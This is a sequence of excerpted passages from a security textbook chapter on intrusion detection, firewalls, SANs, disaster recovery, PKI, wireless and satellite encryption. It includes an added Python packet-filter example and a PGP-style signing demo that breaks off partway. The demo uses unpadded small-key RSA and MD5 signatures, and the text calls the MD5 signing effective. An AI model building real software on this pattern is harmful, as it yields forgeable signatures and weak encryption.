computer security addresses this area by focusing on the design and implementation of more secure operating systems and applications software
...
Functions in the detection phase are primarily provided by intrusion detection
systems, although virus scanners also fall into this category
...
The results of the detection process drive the other two stages of managing security: (a) investigating problems that are discovered and documenting the cause of
the problem and (b) either correcting the problem or devising a means of dealing
with it should it occur again
...
The combination of the investigation and diagnosis/resolution phases is often
called incident response or incident handling
...
What Intrusion Detection Systems and Related Technologies Can and Cannot Do
Every new market suffers from exaggeration and misconception
...
Here
is a primer on how to read intrusion detection marketing literature [3]
...
This is because they monitor the operation of firewalls, encrypting routers, key management servers, and
files critical to other security mechanisms, thus providing additional layers of protection to a secured system
...
Intrusion detection systems can recognize these first hallmarks of attack and
potentially respond to them, mitigating damage
...
Second, intrusion detection systems can also make sense of often obtuse system
information sources, telling you what’s really happening on your systems
...
They are also often incomprehensible,
even to expert system administrators and security officers
...
Third, intrusion detection systems can also trace user activity from the point of
entry to the point of exit or impact
...
Expert attackers can often penetrate firewalls; therefore, the ability to correlate activity corresponding to a
particular user is critical to improving security [3]
...
Putting Trojan horses in critical system files is a standard attack technique
...
File integrity assessment tools utilize
strong cryptographic checksums to render these files tamper-evident and, in the
case of a problem, quickly ascertain the extent of damage [3]
...
Vulnerability assessment products allow consistent auditing and diagnosis
of system configuration settings that might cause security problems
...
Some of these
product offerings even offer automated fixes for the problems uncovered [3]
...
Vulnerability assessment products also allow the
user of a system to quickly determine what attacks should be of concern to that system
...
These products also provide a valuable sanity check for those
installing and setting up new security infrastructures
...
Seventh, intrusion detection systems can relieve your system management staff
of the task of monitoring the Internet, searching for the latest hacker attacks
...
The firms developing these products have expert staffs that monitor the Internet and other sources for
reports and other information about new hacker attack tools and techniques
...
Eighth, intrusion detection systems can make the security management of your
systems by nonexpert staff possible
...
These are window-based,
point-and-click screens that step users through setup and configuration in a logical, readily understood fashion [3]
...
Many intrusion
detection and assessment products are part of comprehensive security suites that include security policy building tools
...
Unrealistic Expectations
First, intrusion detection systems are not silver bullets
...
In networks, it is also a “weakest link”
phenomenon (it only takes one vulnerability on one machine to allow an adversary
to gain entry and potentially wreak havoc on the entire network)
...
There are no magic solutions to network security
problems, and intrusion detection products are no exception to this rule
...
Second, intrusion detection systems cannot compensate for weak identification
and authentication mechanisms
...
Therefore, you must still rely on other means of identification and authentication of users
...
A security
infrastructure that includes strong identification and authentication and intrusion
detection is stronger than one containing only one or the other [3]
...
In very secure environments, incidents happen
...
One must investigate the attacks, determine the responsible party where
possible, and then diagnose and correct the vulnerability that
allowed the problem to occur, reporting the attack and its particulars to authorities
where required
...
However, the intrusion-detection system is not capable of
identifying the person at the other end of the connection without human intervention
...
Fourth, intrusion detection systems cannot intuit the contents of your organizational security policy
...
These functions can not only spot the high-school hacker executing the “teardrop” attack against your file server, but also spot the programmer accessing the payroll system
after hours
...
Fifth, intrusion detection systems cannot compensate for weaknesses in network protocols: transmission control protocol (TCP)/IP and many other network protocols do not perform strong authentication of host source and destination addresses
...
It is difficult to identify who
is attacking one’s system; it is very difficult to prove the identity of an attacker in a
court of law—for example, in civil or criminal legal processes [3]
...
In other words, “garbage in
garbage out” still applies
...
Despite the best efforts on the part of system vendors,
many of these sources are software-based; as such, the data are subject to alteration
by attackers
...
This argues for the value of integrated, sometimes redundant, information sources; each additional source increases the possibility of
obtaining information not corrupted by an attacker [3]
...
Network-based intrusion detection is capable of monitoring traffic on a
network, but only to a point
...
Also, as traffic levels rise, the associated processing load required to keep up becomes prohibitive and the analysis engine either falls
behind or fails
...
Eighth, intrusion detection systems cannot always deal with problems involving packet-level attacks
...
The heart of the vulnerabilities involves the difference
between the intrusion detection systems’ interpretation of the outcome of a network transaction (based on its reconstruction of the network session) and the destination node for that network session’s actual handling of the transaction
...
Worse yet, an adversary can use this sort of packet manipulation to accomplish a
denial of service attack on the intrusion detection system itself by overflowing
memory allocated for incoming packet queues [3]
...
Dealing with fragmented packets can also be problematic
...
Other problems associated with advances in network
technologies include the effect of switched networks on packet-capture-based network intrusion detection systems
...
This problem can be mitigated in those switches
offering monitoring ports or spanning capability; however, these features are not
universal in current equipment [3]
...
Thanks to government and military interest in information warfare (discussed
in Chapters 13 to 19), of which intrusion detection is a vital defensive component,
funding of research efforts has skyrocketed, with no end in sight
...
Intrusion detection products have now been embedded as
standard components of major governmental and financial networks [3]
...
Also look for products that function at application level and that interoperate with network management platforms
...
FIREWALL SECURITY SYSTEMS
Today, when an organization connects its private network to the Internet, security
has to be one of the primary concerns
...
With most organizations now
connecting to the Internet, and big business and big money moving toward electronic commerce at warp speed, the motive for mischief from outside is growing
rapidly and creating a major security risk to enterprise networks
...
These firewall gateways provide a choke point at which security and auditing can be imposed
...
The threat of attack on your network increases proportionally with the continued exponential growth of the Internet
...
This book illustrates many reasons why this is necessary, as well as
many techniques to consider for your firewall solution
...
Also, do not
put sensitive information in a place where it can be accessed over the Internet
...
Nevertheless, a number of the security problems with the Internet can be remedied or made less serious through the use of existing and well-known techniques
and controls for host security
...
This section provides an overview of firewall technology, including how firewalls protect
against vulnerabilities, what firewalls don’t protect against, and the components
that make up a firewall
...
The actual means by which this is accomplished varies widely,
but in principle, the firewall can be thought of as a pair of mechanisms: one that
blocks traffic and one that permits traffic
...
Probably the most important thing to recognize about a firewall is that it implements an access control policy
...
In other words, a firewall is a network security product that acts as a barrier between two or more network segments
...
A firewall can
also provide audit and alarm mechanisms that will allow you to keep a record of all
access attempts to and from your network, as well as a real-time notification of
things that you determine to be important
...
Rather, a firewall is an approach to security; it helps implement a larger security policy that defines the services and access to be permitted, and it is an implementation
of that policy in terms of a network configuration, one or more host systems and
routers, and other security measures such as advanced authentication in place of static passwords
...
It implements a network access policy by forcing connections to pass through the firewall, where they can be examined and evaluated
...
A firewall system is usually located at
a higher-level gateway, such as a site’s connection to the Internet
...
Why do we need firewalls? What can a firewall do for you? Why would you
want a firewall? What can a firewall not do for you? All of these burning questions
are answered next for those inquiring security minds that want to know
...
In a firewall-less environment, network security relies totally on host security,
and all hosts must, in a sense, cooperate to achieve a uniformly high level of security
...
As mistakes and lapses in security become more common, break-ins occur not as the result of complex attacks, but because of simple errors in configuration and inadequate passwords
...
In today’s world, corporations face a variety of information system
attacks against their local area networks (LANs) and wide area networks (WANs)
...
These attacks come from
three basic groups:
Persons who see attacking a corporation’s information system as a technological challenge
Persons with no identified political or social agenda who see attacking a corporation’s information system as an opportunity for high-tech vandalism
Persons associated with a corporate competitor or political adversary who see
the corporation’s information system as a legitimate strategic target
To combat this growing and complex threat to a corporation’s LAN and Internet site, a series of protective countermeasures needs to be developed, continually
updated, and improved
...
You’ve got password protection on
your servers and you’ve implemented other security measures on your servers as
well
...
An external firewall is used to counter
threats from the Internet
...
The internal firewall is used to separate and protect corporate
databases (for example, financial databases can be separated from personnel databases)
...
Firewalls, however, are just one element in an array of possible information
technology (IT) systems countermeasures
...
The effectiveness of this strategy will
have a direct bearing on the success of any firewall that a corporation builds or purchases
...
Least Privilege
The principle of least privilege means that an object is given only the privileges it
needs to perform its assigned tasks
...
Defense in Depth
Don’t depend on one security solution
...
These layers should consist of a variety of security products and services
...
Do you want to let them even begin to work against your server’s security? Isn’t it
possible that your administrator might go home at night and miss the attack?
Can’t human errors in password security be made now and then? Firewalls are designed to allow you a very important second layer of protection
...
A firewall approach provides numerous advantages to sites by helping to increase overall host security
...
Benefits of Firewalls
A firewall provides a leveraged choke point for network security
...
The firewall can control and prevent attacks
from insecure network services
...
In this manner, the firewall serves as an auditor for the system
and can alert the corporation to anomalies in the system
...
Some firewalls, on the other hand, permit only email traffic through them,
thereby protecting the network against any attacks other than attacks against the
email service
...
Generally, firewalls are configured to protect against unauthenticated interactive logins from the outside world
...
More elaborate firewalls block traffic from the outside to the inside but permit users on the inside to communicate
freely with the outside
...
Unlike in a situation where a computer system
is being attacked by someone dialing in with a modem, the firewall can act as an effective phone tap and tracing tool
...
Often, a firewall provides summaries to the administrator about what
kinds and amounts of traffic passed through it, how many attempts there were to
break into it, and so on
...
As a result, the subnet network environment is exposed to fewer risks, since only selected protocols will be able to
pass through the firewall
...
This provides the benefit of preventing the services from being exploited by outside attackers, but at the same time permits the use of these services with greatly reduced risk to exploitation
...
Firewalls can also provide protection from routing-based attacks, such as source
routing and attempts to redirect routing paths to compromised sites via Internet
control message protocol (ICMP) redirects
...
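The firewall behaviours described in this section (a pair of mechanisms that block and permit, blocking outside-to-inside while letting insiders out, permitting only a named service such as mail, acting as an auditor, and dropping source-routed packets and ICMP redirects) are brought together in one added example: a first-match packet-filter policy with a default deny, written for this page rather than taken from the book or any firewall product. The internal address range, the mail server address, the interface names and the traffic sample are constructed assumptions, and the "established" rule is a stateless approximation (any TCP segment that is not a bare SYN) standing in for real connection tracking.

```python
from dataclasses import dataclass
from ipaddress import ip_address, ip_network

# Constructed site layout (assumption): one internal network and one mail
# server that the outside world is allowed to reach.
INSIDE = ip_network("10.0.0.0/8")
MAIL_SERVER = ip_address("10.0.1.25")


@dataclass
class Packet:
    iface: str                   # "outside" or "inside": interface the packet arrived on
    src: str
    dst: str
    proto: str                   # "tcp", "udp" or "icmp"
    dport: int = 0
    syn_only: bool = False       # TCP SYN without ACK, i.e. a new connection attempt
    icmp_type: int = -1          # ICMP type 5 is a redirect
    source_routed: bool = False  # IP source-route option present


def inside(addr: str) -> bool:
    return ip_address(addr) in INSIDE


# Ordered rule list of (name, predicate, verdict). The first matching rule
# decides; a packet matching nothing falls through to the default deny, so
# every permitted service has to be stated explicitly.
RULES = [
    ("drop-source-routed", lambda p: p.source_routed, "deny"),
    ("drop-icmp-redirect", lambda p: p.proto == "icmp" and p.icmp_type == 5, "deny"),
    # anti-spoofing: nothing arriving from outside may claim an inside source
    ("drop-spoofed-inside-src", lambda p: p.iface == "outside" and inside(p.src), "deny"),
    ("permit-inbound-smtp", lambda p: p.iface == "outside" and p.proto == "tcp"
                                      and ip_address(p.dst) == MAIL_SERVER and p.dport == 25, "permit"),
    # replies to connections opened from inside (stateless approximation)
    ("permit-established", lambda p: p.iface == "outside" and p.proto == "tcp"
                                     and inside(p.dst) and not p.syn_only, "permit"),
    ("permit-outbound", lambda p: p.iface == "inside" and inside(p.src), "permit"),
]


def evaluate(p: Packet) -> tuple:
    """Return (verdict, rule name) for one packet."""
    for name, match, verdict in RULES:
        if match(p):
            return verdict, name
    return "deny", "default-deny"


def run(packets) -> tuple:
    """Apply the policy, keeping an audit record of every decision; denied
    packets are also returned separately as alerts for the administrator."""
    audit, alerts = [], []
    for p in packets:
        verdict, rule = evaluate(p)
        entry = (p.iface, p.src, p.dst, p.proto, p.dport, verdict, rule)
        audit.append(entry)
        if verdict == "deny":
            alerts.append(entry)
    return audit, alerts


# Constructed traffic sample using documentation addresses, not real hosts.
SAMPLE = [
    Packet("outside", "198.51.100.7", "10.0.1.25", "tcp", 25, syn_only=True),   # mail delivery
    Packet("outside", "198.51.100.7", "10.0.1.25", "tcp", 23, syn_only=True),   # telnet attempt
    Packet("inside", "10.0.5.12", "198.51.100.7", "tcp", 443, syn_only=True),   # user browsing out
    Packet("outside", "198.51.100.7", "10.0.5.12", "tcp", 51000),               # reply to that session
    Packet("outside", "10.0.9.9", "10.0.1.25", "tcp", 25, syn_only=True),       # spoofed inside source
    Packet("outside", "198.51.100.7", "10.0.5.12", "icmp", icmp_type=5),        # ICMP redirect
    Packet("outside", "198.51.100.7", "10.0.5.12", "tcp", 80, source_routed=True),
]


if __name__ == "__main__":
    audit, alerts = run(SAMPLE)
    for entry in audit:
        print(entry)
    print(len(alerts), "denied packets logged for review")
```

Rule order matters: the routing-based and anti-spoofing denies sit above every permit so that a source-routed or spoofed packet can never be let through merely because it is addressed to a permitted service.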
Controlled Access to Site Systems
A firewall also provides the ability to control access to site systems
...
A site could prevent outside access to its
hosts except for special cases such as email servers or information servers
...
Put
differently, why provide access to hosts and services that could be exploited by attackers when the access is not used or required? If, for example, a user requires little or no network access to his or her desktop workstation, then a firewall can
enforce this policy
...
ICMP supports packets containing error, control, and informational messages
...
Concentrated Security
A firewall can be less expensive for an organization, in that all or most modified
software and additional security software could be located on the firewall systems
as opposed to being distributed on many hosts
...
Other solutions to network security such as Kerberos involve modifications at
each host system
...
Kerberos is an authentication system developed at the Massachusetts Institute of
Technology (MIT)
...
It works by assigning a unique key,
called a ticket, to each user that logs on to the network
...
Enhanced Privacy
Privacy is of great concern to certain sites, since what would normally be considered
innocuous information might actually contain clues that would be useful to an attacker
...
Finger displays information about users such as their last login
time, whether they’ve read mail, and other items, but finger could also leak information
to attackers about how often a system is used, whether the system has active users
connected, and whether the system could be attacked without drawing attention
...
Some sites feel that by blocking this information, they are hiding information that
would otherwise be useful to attackers
...
A firewall with appropriate alarms that sound when suspicious activity occurs can also provide details
on whether the firewall and network are being probed or attacked
...
Of primary importance is knowing whether the firewall is withstanding probes and attacks and determining whether the controls on the firewall
are adequate
...
Policy Enforcement
Lastly, but perhaps most importantly, a firewall provides the means for implementing and enforcing a network access policy
...
Thus, a network access policy can be enforced by a
firewall, whereas without a firewall, such a policy depends entirely on the cooperation of users
...
There are also a number of disadvantages to the firewall approach, and there
are a number of things that firewalls cannot protect against
...
Limitations of Firewalls
Firewalls can’t protect against attacks that don’t go through the firewall
...
Unfortunately for those concerned,
a magnetic tape can just as effectively be used to export data
...
It’s silly to build
an 8-foot-thick steel door when you live in a wooden house
...
For a firewall to work, it must be a part of a consistent overall organizational security architecture
...
For example, a site with top
secret or classified data doesn’t need a firewall at all: they shouldn’t be hooking up
to the Internet in the first place; or the systems with the really secret data should be
isolated from the rest of the corporate network
...
While an industrial spy might export information through your firewall,
he or she is just as likely to export it through a telephone, fax machine, or floppy
disk
...
Firewalls also cannot protect you against stupidity
...
An attacker may be able to break into your network by completely bypassing your firewall if he or she can find a helpful employee inside who can be
fooled into giving access to a modem pool
...
It has no concept
of the value or sensitivity of the data it is transferring between networks and therefore cannot protect information on that basis
...
If a user chooses to modify or
propagate that information, the firewall has no effect
...
It cannot, however, test or
ensure information integrity before it receives it or after it releases it
...
A firewall cannot provide access control on any of your inside systems from
someone already inside the firewall
...
Finally, a firewall cannot completely protect your systems from data-driven attacks such as viruses
...
There are too many
ways of encoding binary files for transfer over networks and too many different architectures and viruses to try to search for them all
...
In general, a firewall
cannot protect against a data-driven attack—attacks in which something is mailed
or copied to an internal host, where it is then executed
...
Data-driven attacks are those that are transferred as data to the target system by
user applications such as FTP, WWW, and email
...
A firewall cannot completely eliminate
the threat of this type of attack
...
Organizations that are deeply concerned about viruses should implement
organization-wide virus control measures
...
Blanketing your network with virus scanning software will protect against viruses that come in via floppy disks, modems, and
the Internet
...
As previously discussed, a firewall is a system or group of systems that enforces
an access control policy between two networks
...
Usually they can be thought of as two
mechanisms: one that permits traffic and one that blocks traffic
...
A company should not
leave this to the discretion of the service or product that will supply their security
because only the company knows what kind of protection it needs
...
Firewalls are designed to protect your network from attacks originating from
another network
...
Some firewalls permit only email traffic through them, thereby protecting the network against any attacks other than attacks against the email service
...
A
more effective firewall will allow users on the protected network to communicate
freely with the outside world; this is the reason a company connects its LAN to the
Internet
...
A firewall will not block attempts to break into a network that come from external modems or from internal attacks
...
If a
company has top secret information that it wants to keep secret, it should not connect any machines containing this information to the Internet
...
Most companies would like to have some
kind of Internet access available to their employees
...
Finally, leaks of information are far more likely to walk out the front door of
the office on a floppy disk than over the Internet through your firewall
...
As
distasteful as the idea might be, with disaster comes opportunity, and the disasters
of September 11, 2001, provided a good opportunity for storage networks to show
their value by providing critically important business continuity
...
Today, organizations continue to expose their IT systems to a wide range of potential security threats as they continue to broaden their reach to business partners
and customers around the globe
...
Types of Computer Forensics Systems
Because IT systems are only as secure as the weakest link in the network, organizations need to consider outsourcing their data storage security needs to one
vendor, which will help them develop a comprehensive security plan and architecture that helps ensure safe, reliable data processing throughout a SAN
...
Nevertheless, demand for high-availability SANs and disaster recovery technology is soaring as companies realize their IT dependency
...
This
network would be a high-performance implementation, such as a fiber channel,
that encapsulates protocols such as a small computer system interface (SCSI)
...
This is not available
using TCP/IP
...
Storage abstraction refers to an indirect representation of storage that has also been
called virtualization
...
Thus, most
system vendors have ambitious strategies to change the way enterprise operations
store and manage data with new capabilities based on SANs
...
Conversely, in
order to amortize the cost of the storage over many servers, SANs are also being used
to provide increased server connectivity to centralized arrays and tape libraries
...
This solution holds perhaps the greatest promise for
the storage-centric model of computing as shown in Figure 3.4
...
SANs promise the ability to make any-to-any connections among multiple
servers and storage devices
...
SANs also promise to simplify backup procedures
...
In
other words, SANs allow distributed servers to access a large centralized storage
subsystem for data-sharing applications during an NDR
...
Figure 3.4 Storage-centric model of computing
Devices could also be distributed throughout a campus yet managed from a
central point though a single management tool
...
SAN Benefits
A SAN provides a perfect environment for clustering that can extend to dozens of
servers and storage devices—all the while having redundant links in a fibre channel
fabric
...
Centralized Management
When a disk or controller fails in a direct-attached environment, redundant systems
keep the redundant array of independent (or inexpensive) disks (RAID) array operating normally and generate an alarm
...
Also,
the chances are good that because of human error or inefficient management practices, an alarm will eventually be missed and a storage subsystem will fail in an enterprise with a large number of RAID subsystems managed in a decentralized fashion
...
Everyday administrative tasks can be centrally managed
...
Scalability
A storage area network can lower acquisition and expansion costs, in addition to
lowering management costs
...
Without disrupting data access, customers can add storage resources and even servers online
...
Reliability
A SAN is a network that resides between the host bus adapter and the storage device
...
Because monitoring of the network is much
easier now, centralization facilitates more rigorous, consistent management practices and thus increases the overall reliability
...
Current fibre channel connections can support 400 MB/sec and greater
data-transfer rates for faster access to more storage resources than they do for
server-attached or LAN-attached storage today
...
Making it possible to access more devices at one time is another way that a SAN
can improve performance
...
SANs aren’t the only alternative storage solution during an NDR, but they are
the best alternative available today
...
NETWORK DISASTER RECOVERY SYSTEMS
The high availability of mission-critical systems and communications is a major requirement for the viability of the modern organization
...
How would your company respond in the event of a network disaster or emergency? Network disaster recovery (NDR) is the ability to respond to an interruption
in network services by implementing a disaster recovery plan to restore an organization’s critical business functions
...
In recent years, data has
become a vitally important corporate asset essential to business continuity
...
While the great majority of companies have plans for NDR in place, those without an NDR plan indicate that they intend to create one
...
Staff training is clearly the greatest missing link in disaster recovery preparations
...
Many companies see their disaster recovery efforts as being focused primarily
on their IT departments
...
Not surprisingly, the
person most frequently cited as being responsible for the management of an NDR
plan is the company’s chief information officer (CIO) or another IT manager
...
Network outages are the number-one issue for smaller companies and high on the list
for larger companies
...
Natural disasters also ranked high
...
Larger companies (those with $20 million or more in annual revenues) are
more likely than smaller companies to prepare for events such as hardware component failure versus natural disasters and accidental employee-initiated outages
...
As for components that are or will be part of their NDR plan, larger businesses
are more likely to perform or plan to perform a business impact analysis than
smaller firms
...
A majority of companies indicate they review their NDR plans every quarter,
but some companies haven’t reviewed their plans at all
...
The data center is the most frequently tested plan component
...
The impact of the loss of mission-critical systems naturally varies depending on
a company’s size
...
Major hardware component failure and a network failure are the most common problems
...
Most companies believe they don’t have to worry about
being offline for long
...
SANs offer the most promising solutions for storage problems today, complementing the other solutions of direct storage, centralized storage, and network-attached
storage
...
The majority seemed to be following reasonably good planning practices,
focusing on major potential sources of problems
...
Thus, there’s a potential disconnect in terms of
perception
...
PUBLIC KEY INFRASTRUCTURE SYSTEMS
To mitigate the security risks of conducting business in an open environment while
at the same time maintaining the cost advantages of doing so, enterprises are turning their attention to an emerging segment of the security market known as public
key infrastructure (PKI)
...
PKI accomplishes these goals for an
enterprise through policy and technology components
...
This section briefly identifies the key concepts and issues surrounding the
technologies and policies required to implement and support an enterprise PKI
...
It is fast becoming essential for effective, secure
e-commerce and to fulfill general security and authentication requirements over
nonsecure networks (like the Net)
...
PKI Defined
A PKI enables users of an insecure public network such as the Internet to securely
and privately exchange data through the use of a public and a private cryptographic
key pair that is obtained and shared through a trusted authority
...
PKI is the underlying
technology that provides security for the secure sockets layer (SSL) and hypertext
transfer protocol secure sockets (HTTPS) protocols, which are used extensively to
conduct secure e-business over the Internet
...
Traditional cryptography involves the creation and sharing of a secret key
for the encryption and decryption of messages
...
For this reason, public key cryptography and the PKI is the
preferred approach on the Internet
...
It has been adopted by the popular Web browsers
and is widely used for one-off business-to-customer (B2C) transactions
...
Large-scale PKI implementations therefore demand careful planning and management if goals are to be realized within the desired timescales
...
WIRELESS NETWORK SECURITY SYSTEMS
To many security experts, it’s an epidemic waiting to happen
...
Businesses will have spent $60 billion
on wireless communications services and wireless network security by the end of
2005
...
That’s good
news for employee productivity, but bad news for companies ill-prepared to head
off wireless network security breaches and debilitating viruses
...
That’s about to change
...
They expect to see
3
...
With that, you get a full-scale epidemic in the works
...
The wireless world, with its often-incompatible alphabet soup of standards,
may be new territory for many IT managers
...
They’ll soon need to think again or face threats that
could wreak havoc
...
Among them are those that head off problems on a wireless network level, within
applications and on devices
...
Nevertheless, one virus that did hit U.S. handhelds was known as the Liberty virus
...
The virus wasn’t devastating for people who regularly back up their PDA information
on their PCs
...
One virus was distributed in Scandinavia as
a short message
...
In order to get their phones fixed, users had to take them in to their service
providers
...
One incident in Japan caught the attention of wireless operators and software companies
around the globe
...
When customers clicked on the link, their phones automatically dialed Japan’s
emergency response number
...
For example, similar viruses could be unleashed that might flood a company’s call center
or cause phones to dial a 900 number
...
The threat of data theft, perhaps, is more alarming to businesses
...
The developers of standards such as the wireless application protocol (WAP) and the
wireless LAN 802.11
...
Because the wireless network is essentially everywhere, sniffing is an inherent
problem in wireless
...
The problem is that with wireless, they don’t
even have to be in the network
...
The widely used wireless LAN standard, 802.11
...
Still, there is some hope, because developers addressed wireless network
security from the start and are working to beef it up before wireless LANs become
more pervasive
...
There will be
attacks on the devices themselves, but they quickly will be focused on transactions
...
Typically, you should look to the past to predict the future
...
Each time software companies release popular technologies in the PC environment, people use them to write malicious code
...
For example, a Windows program can currently run on a
Windows Compact Edition (CE) device, but CE doesn’t yet support macros
...
Wireless devices are rapidly developing other capabilities
...
There’s more of a chance of things being used improperly as you create
more functionality
...
NTT DoCoMo, for example, opened its wireless network globally in 2003
...
Also, the more capabilities supported by devices, the greater the potential for
viruses to spread between PCs and mobile devices, which could enable viruses to
spread very quickly
...
Then viruses can spread easily
via email or programs that synchronize PCs and handheld devices
...
Thus, as 802.11
...
The basic 802.11
...
For wireless networks with high security requirements, the weaknesses in WEP encryption require
a more robust solution
...
For larger wireless networks, or for networks with high security requirements, a VPN solution based on currently available technology provides a
very scalable solution for 802.11
...
VPN for wireless is also a logical extension of the remote access VPN capability found in most large businesses
today
...
802.1X, a standards-based solution for port-level authentication for any wired or wireless Ethernet client system
...
The reason might lie in the
use of fairly simple attack tools that have dominated most DDoS incidents
...
As defense
mechanisms are deployed to counter these simple attacks, they are expected to be
faced with more complex strategies
...
Unfortunately, their results are not yet available
...
Nevertheless, DDoS attacks are a complex and serious problem, and consequently, numerous approaches have been proposed to counter them
...
This chapter is a first attempt to cut through the obscurity and
achieve a clear view of the problem and its solutions
...
One benefit of the development of DDoS classifications has been to foster easier cooperation among researchers on DDoS defense mechanisms
...
The Internet community must be equally cooperative to counter
this threat
...
They will also clarify how different mechanisms are likely to work
in concert and identify areas of remaining weakness that require additional mechanisms
...
The preceding classifications are not necessarily complete or all-encompassing
...
As defense mechanisms are deployed to counter simple attacks, we are likely to see more complex
attack scenarios
...
Thus, these classifications are likely to require expansion and refinement as new threats and defense
mechanisms are discovered
...
The ultimate value of the wireless network security technology described in this section will thus be in the degree
of discussion for the next computer forensics system, known as satellite encryption
security systems
...
The ability to securely exchange information between billions of users around the globe involving perhaps
trillions of transactions is vital to the continued growth and usefulness of satellite
communications as well as the Internet and intranets
...
This section shows how governments and organizations around the world can
use satellite encryption to help preserve vital national secrets, limit attacks on a nation’s information infrastructure, and eliminate security and authentication obstacles to electronic commerce
...
Current and Future Satellite Technology
A look at the potential threat to these orbiting systems from the Internet is of the
utmost importance before covering how to use encryption to best protect them
...
High-Tech Mayhem
Attacks on satellite systems regularly fill plot lines of Hollywood movies
...
Such incidents could be all too real in the near future
...
A serious threat is sure to evolve if the international community doesn’t
take steps now to protect these systems in the future
...
For the sake of
public trust in the Internet, an infrastructure must be designed to support the safe
use of land-based communication links or ground stations (called gateways, they
connect terrestrial networks with satellite systems) as shown in Figure 3.5
...
Systematic mechanisms and protocols must be developed to prevent breaches of security
while transmitting data to (uplink) a satellite or receiving (downlink) data from it
...
Figure 3.5 The low Earth orbit (LEO) network
...
All of
these protection mechanisms are designed to ensure that only an authorized person
can gain access to systems and alter information
...
For instance, some tools
check the records (called audit logs) of system behavior, while others examine user
activities on the system as they occur
...
If the messages traveling over the
Internet via satellite connection can be modified en route, the message Jeremiah receives need not be the one Lisa sent
...
The attacker can then read the messages on this intermediate satellite site, change
their contents, and forward them to the original destination as if the intermediate
site were legitimately on the message’s path—a so-called odd person out attack
...
Figure 3.6 The path of a public-key-encrypted message
...
With this scheme, if Lisa
wants to send Jeremiah confidential mail, she enciphers a message using Jeremiah’s
public key and sends the enciphered message to him as shown in Figure 3.6
...
Only
Jeremiah, with his private key, can decipher this message; without that key, the attacker cannot read or change Lisa’s message
...
Thus, Lisa would
encipher the message using the attacker’s public key and send that message to Jeremiah
...
Jeremiah receives the altered message, deciphers it,
and the business deal goes sour
...
Suppose Lisa uses a Web browser to view a Web site in Italy
...
When she clicks on the link, an applet that scans her system for personal information (such as a credit card number) and invisibly emails it to the attacker is
downloaded along with the image
...
This trust in implied situations
(this program only does what it says it does) is violated by computer programs containing viruses and trojan horses
...
The ability to securely exchange information between two users or between a
service provider and a user via satellite connection is vital to the continued growth
and usefulness of satellite communications as we approach the next millennium
...
However, secure exchange can be either a one-way
or a two-way encounter, and the satellite encryption requirements and strategies
are quite different for each
...
Although email messages are frequently answered, each message
transmission is a unique, stand-alone event
...
Client/server applications, Web exchanges, and many other online applications
typify the second class of satellite communications and Internet exchange: two-way
transactions
...
For these two-way transactions, there are again two main
security concerns: first, the service wants assurance that the user is not an impostor but
actually the person claimed (authenticity)
...
Although these concerns seem similar, the solutions are quite different
...
PGP is a widely used email security
package for one-way transactions, while Kerberos is a widely used client/server security package for two-way transactions
...
Pretty Good Privacy
PGP uses the RSA (Rivest, Shamir, Adleman) public key encryption scheme and the
MD5 (Message Digest 5) one-way hash function to form a digital signature, which
assures the recipient that an incoming satellite transmission or message is authentic—that it not only comes from the alleged sender but also has not been altered
...
The sender creates a private message
...
MD5 generates a 128-bit hash code of the message
...
The hash code is encrypted with RSA using the sender’s private key, and
the result is attached to the message
...
The receiver uses RSA with the sender’s public key to decrypt and recover
the hash code
...
The receiver generates a new hash code for the message and compares it to
the decrypted hash code
...
The combination of MD5 and RSA provides an effective digital-signature
scheme
...
Because of the strength of
MD5, the recipient is also assured that no one else could have generated a new message that matched the hash code and, hence, the signature of the original message
...
In both cases, PGP uses the IDEA (international data encryption algorithm) cipher for confidentiality
...
In any conventional satellite encryption system, one must address the problem
of key distribution
...
That is, a new
key is generated as a random 128-bit number for each message
...
The sender generates a message and a random 128-bit number to be used
as a session key for this message only
...
The message is encrypted, using IDEA with the session key
...
The session key is encrypted with RSA using the recipient’s public key and
is prepended (to prefix a string or statement with another or to place a
word or set of numbers in front of an existing word or set of numbers; for
example, to prepend “sub” to “net” would yield “subnet”) to the message
...
The receiver uses RSA with its private key to decrypt and recover the session key
...
The session key is used to decrypt the message
...
The common misconception holds that each user simply keeps
his or her private key private and publishes the corresponding public key
...
An impostor can generate a public and private key pair and disseminate the
public key as if it belonged to someone else
...
Meanwhile, Mark has generated a public and private key pair, attached Shawn’s name and an email address that Mark can access, and
then published this key widely
...
The result
is that Mark receives and can decrypt the message, Shawn never receives the message, and, even if he did, he could not read it without the required private key
...
The essential elements of a public key certificate are the public key itself, a user ID
consisting of the key owner’s name and email address, and one or more digital signatures for the public key and user ID
...
The digital signature is formed using the private key of the signer
...
If any change is made to either the public key or the user ID, the signature
will no longer compute as valid
...
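The two PGP procedures described above (an MD5 hash signed with the sender's RSA private key, and a one-time 128-bit session key wrapped under the recipient's RSA public key and prepended to the message), together with the public key certificate check that binds a key to a user ID, as one added Python example that is not code from the book or from PGP. It assumes textbook RSA with small keys in place of PGP's real RSA usage and a SHA-256 keystream as a stand-in for IDEA; the names Lisa and Jeremiah are the chapter's, the sample message is constructed.

```python
import hashlib
import os
import random

# ---- textbook RSA (no padding, small demo keys): stands in for PGP's RSA ----
def _is_probable_prime(n, rounds=16):
    """Miller-Rabin primality test; adequate for demo-sized keys."""
    if n < 2:
        return False
    for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29):
        if n % p == 0:
            return n == p
    d, s = n - 1, 0
    while d % 2 == 0:
        d //= 2
        s += 1
    for _ in range(rounds):
        x = pow(random.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(s - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True

def rsa_keygen(bits=512):
    """Return ((n, e), (n, d)). A 512-bit n is far too small for real use."""
    e = 65537
    while True:
        p = q = 0
        while not _is_probable_prime(p):
            p = random.getrandbits(bits // 2) | (1 << (bits // 2 - 1)) | 1
        while not _is_probable_prime(q) or q == p:
            q = random.getrandbits(bits // 2) | (1 << (bits // 2 - 1)) | 1
        phi = (p - 1) * (q - 1)
        if phi % e:  # e must be invertible modulo phi
            return (p * q, e), (p * q, pow(e, -1, phi))

def sign(message, sender_private):
    """MD5 gives a 128-bit hash code; encrypting it with the private key is the signature."""
    n, d = sender_private
    return pow(int.from_bytes(hashlib.md5(message).digest(), "big"), d, n)

def verify(message, signature, sender_public):
    """Recover the hash code with the sender's public key and compare to a fresh hash."""
    n, e = sender_public
    return pow(signature, e, n) == int.from_bytes(hashlib.md5(message).digest(), "big")

def _keystream_xor(key, data):
    """Stand-in for IDEA (assumption): SHA-256 counter keystream XORed with data.
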